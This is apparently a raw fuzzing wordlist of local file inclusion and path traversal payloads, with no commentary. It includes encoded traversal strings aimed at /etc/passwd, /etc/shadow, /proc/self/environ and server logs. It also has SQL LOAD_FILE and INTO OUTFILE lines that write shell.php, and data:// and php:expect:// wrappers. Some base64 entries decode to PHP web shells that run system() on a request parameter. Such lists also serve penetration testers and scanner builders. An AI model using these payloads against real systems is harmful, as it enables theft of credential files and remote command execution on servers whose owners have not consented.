/etc/passwd
/proc/version
/proc/self/environ
/etc/hosts
/etc/shadow
/etc/group
../
../../../
%2f
%2f??c%2f??s??d
%00
/etc/mysql/my.conf
/etc/issue
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/apache/access.log
/var/log/httpd/error_log
LOAD_FILE('/etc/passwd')
INTO+OUTFILE+'/var/www/html/shell.php'
%252e%252e%252f
%252e%252e%252fetc%252fpasswd
/etc/passwd%00
//etc/passwd
//etc/passwd%00
///etc/passwd
file:///etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd%00
..%20..%20..%20../etc/passwd%00
/../../../../../../../../../../etc/passwd^^%00
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=
data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
php:expect://ls